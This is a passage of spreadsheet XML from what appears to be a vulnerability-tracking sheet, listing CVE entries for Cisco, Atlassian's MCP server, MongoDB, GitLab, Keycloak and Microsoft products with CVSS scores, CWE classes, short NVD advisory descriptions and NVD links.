      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a specific file download API of Cisco Secure FMC Software could allow an authenticated, remote attacker to download arbitrary files from an affected system.
This vulnerability exists because user input is not being sanitized. An attacker could exploit this vulnerability by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from the affected system.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20342</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73496</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>atlassian</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to 0.22.0, the confluence_upload_attachment and confluence_upload_attachments tools pass a client-controlled file_path through src/mcp_atlassian/confluence/attachments.py upload_attachment, and the jira_update_issue attachments parameter reaches src/mcp_atlassian/jira/attachments.py upload_attachment, without confining either path to an approved server workspace. In a remote HTTP, SSE, or multi-user deployment, absolute or traversing paths are resolved on the MCP server and uploaded to Atlassian, allowing a client with write-tool access to disclose server files, environment-held Atlassian credentials, or another tenant's data. A local single-user stdio deployment does not cross this trust boundary because the server runs in the caller's environment. This issue is fixed in version 0.22.0.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73496</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76425</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the APIs of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks against the backend database.
This vulnerability is due to insufficient validation of certain parameters that are concatenated directly into an SQL query. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements to an affected endpoint. A successful exploit could allow the attacker to read arbitrary content from the SQL database and conduct server-side request forgery (SSRF) attacks. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76425</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14871</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14871</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1168</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1168</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18212</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the SAML Redirect Binding implementation of Keycloak, an open-source identity and access management solution. The issue occurs because the custom DEFLATE compression and decompression helpers fail to release native zlib memory after use. An unauthenticated attacker can exploit this by sending repeated malformed SAML requests, leading to native memory exhaustion and a denial of service.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18212</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20247</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an unauthenticated, remote attacker to conduct SQL injection attacks on an affected device.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20247</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20343</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a critical API for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to download sensitive files and use unbounded disk space.
This vulnerability exists because a critical API lacks authentication.&amp;nbsp;An attacker could exploit this vulnerability by repeatedly invoking the API. A successful exploit could allow the attacker to download sensitive files that should be restricted and consume disk space so the device could become unresponsive, causing a DoS condition.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20343</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K130"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30" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K133"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33" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76442</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Email Gateway and Cisco Secure Email and Web Manager engineering team has conducted a comprehensive internal security review. This review resulted in software hardening releases that address multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76442 are related to issues with improper validation of specified quantity in input that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-1284.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76442</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr">
        <is>
